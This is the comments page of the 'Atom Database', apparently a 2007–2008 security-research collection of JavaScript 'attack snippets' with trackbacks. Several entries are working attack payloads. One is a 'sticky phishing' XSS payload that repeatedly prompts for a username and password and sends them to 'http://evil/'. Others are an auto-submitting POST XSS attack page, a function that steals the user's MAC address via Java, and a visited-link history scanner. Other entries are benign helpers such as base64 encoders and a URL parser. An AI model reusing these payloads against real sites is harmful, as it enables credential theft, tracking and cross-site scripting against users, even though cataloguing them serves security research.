Comments on: Atom Database

By: JeremyAnderson.com » Blog Archive » XSS

JeremyAnderson.com » Blog Archive » XSS — Wed, 19 Mar 2008 18:24:18 +0000

[...] here are some Atom scriptsÂ Fatal error: Cannot instantiate non-existent class: simplexmlelement in [...]

By: yUnwEb

yUnwEb — Tue, 12 Feb 2008 05:25:46 +0000

MAC ADDRESS

You can steal the user's MAC address with Java 1.6. For Internet Explorer you can use an applet. This information is very sensitive, because the MAC address is a unique identifier. Although it can be easily changed by the user, it can be useful to identify some users with dynamic IP address or using proxies.

function get_mac() {
    try {
        var ifaces = java.net.NetworkInterface.getNetworkInterfaces()
        var ifaces_list = java.util.Collections.list(ifaces);
        for (var i = 0; i < ifaces_list.size(); i++) {
            var mac = ifaces_list.get(i).getHardwareAddress();
            if (mac) {
                return mac;
            }
        }
    } catch (e) { }
    return false;
}

Firefox, Opera, Live Connect, Java SE 6, JavaScript, Information Gathering

By: JavaScript Global Namespace Pollution | GNUCITIZEN

JavaScript Global Namespace Pollution | GNUCITIZEN — Thu, 07 Feb 2008 10:12:00 +0000

[...] polluted by something. The check can be performed by a function similar to the one discussed by the Atom database over [...]

By: Adrian Pastor

Adrian Pastor — Wed, 15 Aug 2007 21:55:58 +0000

POST METHOD XSS

Attack HTML page for XSS vuls that can only be exploited as a POST request (as opposed to GET)

<html>
<!-- this page would be hosted on the attacker's site and the victim would need to be tricked into visiting it -->
<form method="post" action="http://target/vulnerable.jsp">
<input type="text" name="param" value='<script>alert("XSS")</script>'>
</form>
<script>document.forms[0].submit();</script>
</html>

Universal, HTML, JavaScript

By: Adrian Pastor

Adrian Pastor — Wed, 15 Aug 2007 21:37:31 +0000

STICKY PHISHING

This payload launches a phishing attack to the user. It's sticky cuz it won't stop prompting the victim to enter his username and password until he enters both. Once obtained they are forwarded to a third-party site. Ideal for persistent XSS attacks.

do{a=prompt("APP_OR_SITE_NAME: an error has ocurred\nPlease enter your USERNAME","");b=prompt("APP_OR_SITE_NAME: an error has ocurred\nPlease enter your PASSWORD","");} while(a==null || b==null || a=="" || b=="");alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b

JavaScript, Universal, Password Theft

By: pdp

pdp — Fri, 13 Jul 2007 13:38:36 +0000

the ATOM database is closed for new submissions. we are going re-open the service once we deploy the new application infrastructure.

By: pdp

pdp — Thu, 26 Apr 2007 09:48:43 +0000

parseURL

This function parse the URL into an object.

function parseURL(url) {
	var REGEX = /^((\w+):\/\/)?((\w+):?(\w+)?@)?([^\/\?:]+):?(\d+)?(\/?[^\?#]+)?\??([^#]+)?#?(\w*)/;
	
	var fields = {'href': 0, 'username' : 4, 'password' : 5, 'port' : 7, 'protocol' : 2, 'host' : 6, 'hostname' : 6, 'pathname' : 8, 'search' : 9, 'hash' : 10};
	var result = new Object();
	var r = REGEX.exec(url);
	
	for (var field in fields) {
		result[field] = r[fields[field]];
	}
	
	result.hash = result.hash?'#' + result.hash:'#';
	result.search = result.search?'?' + result.search:'?';
	result.username = result.username?result.username:'';
	result.password = result.password?result.password:'';
	
	if (result.port == undefined) {
		switch (result.protocol) {
			case 'http':
				result.port = 80;
				break;
			case 'https':
				result.port = 443;
				break;
			case 'ftp':
				result.port = 21;
				break;
			default:
				result.port = '';
				break;
		}
	}
	
	return result;
}

universal

By: pdp

pdp — Thu, 26 Apr 2007 09:39:26 +0000

walkJSON

This function walk the entire JSON (the j parameter) tree. The c parameter is the function that handles walked nodes.

function walkJSON(j, c) {
    if (typeof(c) != 'function') {
        return;
    }

    for (var i in j) {
        c(i, j[i]);

        if (j[i] instanceof Array || typeof(j[i]) == 'object') {
            arguments.callee(j[i], c);
        }
    }
}

universal

By: GNUCITIZEN » Project Digest 200701

GNUCITIZEN » Project Digest 200701 — Fri, 16 Feb 2007 21:28:15 +0000

[...] Two more database projects were initiated. There is an Ajax Worm Database and the Atom Database for dangerous JavaScript code snippets. I find them quite useful in my work. XSSDB is also expanding. Soon, there will be a feature for integrating the database with user supplied attack vectors. [...]

By: GNUCITIZEN » Browser Focus RIP

GNUCITIZEN » Browser Focus RIP — Mon, 12 Feb 2007 23:59:48 +0000

[...] together with the focus diversion trick to build more advance attack vectors. Check it out here. » trackback | » digg it | bookmark it with » del.icio.us | written by »pdp [...]

By: pdp

pdp — Sun, 11 Feb 2007 22:01:53 +0000

forcefocus

This function can be used to force the focus on a particular element from the current dom.

function forcefocus(target, timeout) {
	var timeout = (timeout == undefined) ? 500 : timeout;

	target.focus();

	setTimeout(function () {
		forcefocus(target);
	}, timeout);
}

All Browsers, focus

By: Back to the LAN at Disenchant’s Blog

Back to the LAN at Disenchant’s Blog — Sun, 04 Feb 2007 14:16:39 +0000

[...] At this point shame on everyone including me who have to work with webapplication security all days and never had a closer look at pdp’s Atom Database at GNUCITIZEN. In this database, pdp already described exactly the same as we can read in Jeremiah’s Blog but thanks to both of them for bringing that stuff to the people because nobody can be aware of things he/she don’t know. So fact is that pdp already wrote something about that and so it’s not new. [...]

By: GNUCITIZEN » The Shadow

GNUCITIZEN » The Shadow — Fri, 02 Feb 2007 14:26:55 +0000

[...] We, as computer security professionals, went a little bit ahead of the attackers and developed ways to hijack the user experience across an entire domain. This is done by employing various XMLHttpRequest and IFRAME techniques. For a demonstration of such kind of attack vector, I enclosed the following snippet extracted from the Atom Database. [...]

By: pdp

pdp — Thu, 01 Feb 2007 11:06:55 +0000

include

Load a remote script file. This function is non-blocking which means that you have to wait for the script to load before using its declarations. For that reason you may want to use the onload callback function.

function include(url, onload) {
	var script = document.createElement('script');
	script.type = 'text/javascript';
	script.onload = onload;
	script.src = url;
	document.body.appendChild(script);
}

Mozilla, Firefox, Opera, include, modules

By: pdp

pdp — Thu, 01 Feb 2007 10:58:41 +0000

include

Load a remote script file. This function is non-blocking which means that you have to wait for the script to load before using its declarations.

function include(url) {
	document.write('<' + 'script src="' + url + '" language="javascript" type="text/javascript"' + '>' + '<' + '/script' + '>');
}

JavaScript, All Browsers, include, modules

By: kuza55

kuza55 — Wed, 24 Jan 2007 08:21:27 +0000

Firefox B64 Functions

These functions are part of the javascript window object in the Gecko engine.

alert (btoa("test"));
alert (atob("dGVzdA=="));

JavaScript, Firefox, base64, Encodings

By: pdp

pdp — Tue, 23 Jan 2007 16:36:36 +0000

b64decode

This function decodes base64 strings.

function b64decode(input) {
	var b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';

	var result = '';
	var chr1, chr2, chr3;
	var enc1, enc2, enc3, enc4;
	var i = 0;

	var input = input.replace(/[^A-Za-z0-9\+\/\=]/g, '');

	do {
		enc1 = b64chars.indexOf(input.charAt(i++));
		enc2 = b64chars.indexOf(input.charAt(i++));
		enc3 = b64chars.indexOf(input.charAt(i++));
		enc4 = b64chars.indexOf(input.charAt(i++));

		chr1 = (enc1 << 2) | (enc2 >> 4);
		chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
		chr3 = ((enc3 & 3) << 6) | enc4;

		result += String.fromCharCode(chr1);

		if (enc3 != 64)
			result += String.fromCharCode(chr2);

		if (enc4 != 64)
			result += String.fromCharCode(chr3);
	} while (i < input.length);
	
	return result;
}

JavaScript, Cross-platformed, base64, Encodings

By: pdp

pdp — Tue, 23 Jan 2007 16:34:29 +0000

b64encode

This function encodes a string in base64 format.

function b64encode(input) {
	var b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';

	var result = '';
	var chr1, chr2, chr3;
	var enc1, enc2, enc3, enc4;
	var i = 0;
	
	do {
		chr1 = input.charCodeAt(i++);
		chr2 = input.charCodeAt(i++);
		chr3 = input.charCodeAt(i++);
		
		enc1 = chr1 >> 2;
		enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
		enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
		enc4 = chr3 & 63;
		
		if (isNaN(chr2)) {
			enc3 = enc4 = 64;
		} else if (isNaN(chr3)) {
			enc4 = 64;
		}
		
		result += b64chars.charAt(enc1) + b64chars.charAt(enc2) + b64chars.charAt(enc3) + b64chars.charAt(enc4);
	} while (i < input.length);
	
	return result;
}

JavaScript, Cross-platformed, base64, Encodings

By: GNUCITIZEN » Atom Database Discussion Topic

GNUCITIZEN » Atom Database Discussion Topic — Mon, 22 Jan 2007 22:22:23 +0000

[...] purpose of this topic is to discuss useful attack snippets (atoms) part of The Atom Database. » trackback | » digg it | bookmark it with » del.icio.us | written by »pdp [...]

By: pdp

pdp — Sun, 21 Jan 2007 09:26:14 +0000

historyScan

Scan user history. This function enumerates the current user visited links by performing checks on their style.

function getDocument(target) {
	if (target == undefined)
		return document;
	else if (target.contentDocument)
		return target.contentDocument;
	else if (target.contentWindow)
		return target.contentWindow.document;
	else if (target.document)
		return target.document;
	else
		throw 'unable to get document object';
}

function historyScan(callback, URLs) {
	var iframe = document.createElement('iframe');
	iframe.style.visibility = 'hidden';
	document.body.appendChild(iframe);
	
	var doc = getDocument(iframe);
	doc.open();
	doc.write('<style>a:visited{display: none}</style>');
	doc.close();
	
	for (index = 0; index < URLs.length; index++) {
		var a = doc.createElement('a');
		a.href = URLs[index];
		doc.body.appendChild(a);
		
		if (a.currentStyle)
			var display = a.currentStyle['display'];
		else
			var display = doc.defaultView.getComputedStyle(a, null).getPropertyValue('display')
			
		callback(URLs[index], display == 'none'?true:false);
	}
	
	document.body.removeChild(iframe);
}

All Browsers, JavaScript, history, scan